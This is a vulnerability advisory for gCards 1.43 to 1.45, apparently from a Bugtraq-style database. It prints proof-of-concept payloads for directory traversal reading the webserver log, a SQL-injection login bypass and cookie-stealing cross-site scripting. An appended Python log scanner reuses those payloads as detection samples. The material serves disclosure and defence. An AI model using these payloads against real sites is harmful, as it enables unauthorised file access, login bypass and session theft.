gCards Multiple Input Validation Vulnerabilities
BID:17165
| Bugtraq ID: | 17165 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 20 2006 12:00AM |
| Updated: | Mar 21 2006 09:09PM |
| Credit: | rgod is credited with the discovery of these vulnerabilities. |
| Vulnerable: | gCards 1.43, gCards 1.45, gCards 1.44 |
| Not Vulnerable: | |
Discussion
The gCards application is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The following vulnerabilities can occur:
- Cross-site scripting
- SQL injection
- Directory traversal
- Local file inclusion
An attacker can access sensitive information, possibly obtain authentication credentials, manipulate SQL query logic to compromise data, and retrieve arbitrary files from the vulnerable system in the context of the webserver process.
Exploit / POC
The following proof-of-concept examples are available:
http://www.example.com/index.php?setLang=suntzu&lang[suntzu][file=../../../../../../../../../../../var/log/httpd/access_log
username: 'or'suntzu'='suntzu'/*
password: [whatever]
http://www.example.com/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Exploit code has been provided.
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
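With no vendor patch listed, one way to review web server access logs for requests shaped like the proof-of-concept URLs in this advisory, as an added example that is not part of the original advisory or of gCards. It assumes Common Log Format and that legitimate gCards requests never carry a `lang[...][file]` parameter; the function names and sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# Parameter shape from the advisory's PoC URLs: lang[<name>][file]
# (the closing bracket is optional because the first PoC is printed without it).
LANG_FILE = re.compile(r"^lang\[[^\]]*\]\[file\]?$")
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
MARKUP = re.compile(r"[<>\"']")
# Common Log Format request field: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(target):
    """Return sorted findings for one request target (path plus query string)."""
    findings = set()
    query = target.partition("?")[2]
    # parse_qsl percent-decodes names and values once, so %5B and %3C are matched decoded.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not LANG_FILE.match(name):
            continue
        # Assumption: the language table is server-side data, never a request parameter.
        findings.add("lang-file-override")
        if TRAVERSAL.search(value) or value.startswith(("/", "\\")):
            findings.add("path-traversal")
        if MARKUP.search(value):
            findings.add("markup")
    return sorted(findings)


def scan(lines):
    """Yield (client, target, findings) for log lines that carry the override."""
    for line in lines:
        m = REQUEST.search(line)
        if m:
            found = classify(m.group(1))
            if found:
                yield line.split(" ", 1)[0], m.group(1), found


# Constructed sample lines using documentation addresses; not from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Mar/2006:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Mar/2006:12:00:05 +0000] "GET /index.php?setLang=suntzu&lang[suntzu][file]=../../../../var/log/httpd/access_log HTTP/1.1" 200 90311',
    '198.51.100.7 - - [20/Mar/2006:12:00:09 +0000] "GET /index.php?setLang=suntzu&lang%5Bsuntzu%5D%5Bfile%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4100',
    '192.0.2.10 - - [20/Mar/2006:12:00:12 +0000] "GET /index.php?setLang=english HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, target, found in scan(SAMPLE_LOG):
        print(client, ",".join(found), target)
```

The SQL injection proof of concept is submitted through the login form, so it does not appear in the request line and is outside what this log check covers.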
References
References:
- gCard Web Site (gCard)
- gCards <= 1.45 multiple vulnerabilities (rgod)